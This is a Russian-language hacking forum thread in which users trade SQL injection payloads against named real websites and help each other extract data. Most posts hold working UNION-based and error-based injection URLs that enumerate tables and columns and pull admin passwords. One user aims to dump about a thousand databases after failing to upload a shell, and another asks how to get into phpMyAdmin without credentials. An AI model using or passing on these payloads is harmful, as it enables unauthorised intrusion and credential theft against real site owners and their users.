http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,3,4,5,GrOuP_CoNcAt(TaBlE_NaMe),7,8,9+from+information_schema.columns-- вывод в title
вообщет ето не таблички... title необязательно,так удобнее.. спс. http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,GrOuP_CoNcAt%28TaBlE_NaMe%20%29,4,5,6,7,8,9+from+information_schema.tables--
Я немного не правильно выразился Почти 1к БД, нужно как-то это всё слить и разобраться где там таблица с админскими пассами, т.к через inject там шелл не получается залить вот примерно так всё это выглядит, половина БД пустые
сделай запрос на вывод по другому..если админы в той же табелке что и обычные юзвери они отличаются статусом, левелом .попробуй что то типа : www.site.ru/news.php?id=[sql]+union+select+1,2,3,password+from+users+where+user_level=1-- ну или что то наподобее этого, все зависит от данных в твоей табличке с аккаунтами
Алкорайдер. В следующий раз делай скрин как, "черный квадрат малевича" .. Как вариат, ищи вручную... http://www.mynhw.co.uk/news-full.php?id=-644+UNION+SELECT+1,2,group_concat(table_name,0x3a,column_name),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+like+0x257061737325 Я халосий
Телепат, не? Пробовал сам разобрать что там за урл, не получилось, думал норм замазал Ок, попробую, спасибо
Это безусловно ясно, я всего лишь предложил, как альтернативный вариант, тем более ограничение при group_concat() легко обходится substring(), а "лишнее" тоже можно исключить из вывода! Пример: Code: SELECT substring(GROUP_CONCAT(DISTINCT table_schema separator 0x0a),0,512) FROM information_schema.tables Долго и муторно это
Есть сайт с phpMyAdmin 2.11.8.1. Можно ли как нибудь войти в пхпмайадмин не имея логина и пароля? Нашел вот этот эксплоит, но не могу понять, что он мне даст =\. И что прописать в: ? Точнее как узнать полный ftp-путь до файла с содержимым <? phpinfo();exit; ?>?
вроде блайнд,версия 5 хелп!!! Code: http://www.plan-art.co.uk/case.php?id=116+and+substring(@@version,1,1)=5--
http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--
неплохо, но хотелосьбы получить еще базы,таблички,колонки...и потом выдрать инфу из таблички... желательно в подробностях...
table_name: Code: http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+table_name),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)+--+ admin column_name: Code: http://www.plan-art.co.uk/case.php?id=116+and+(select+1+from+(select+count(0),concat((select+column_name),floor(rand(0)*2))+from+information_schema.columns+where+table_name='admin'+group+by+2)a)+--+ password Вместо version() пиши то, что тебе нужно.
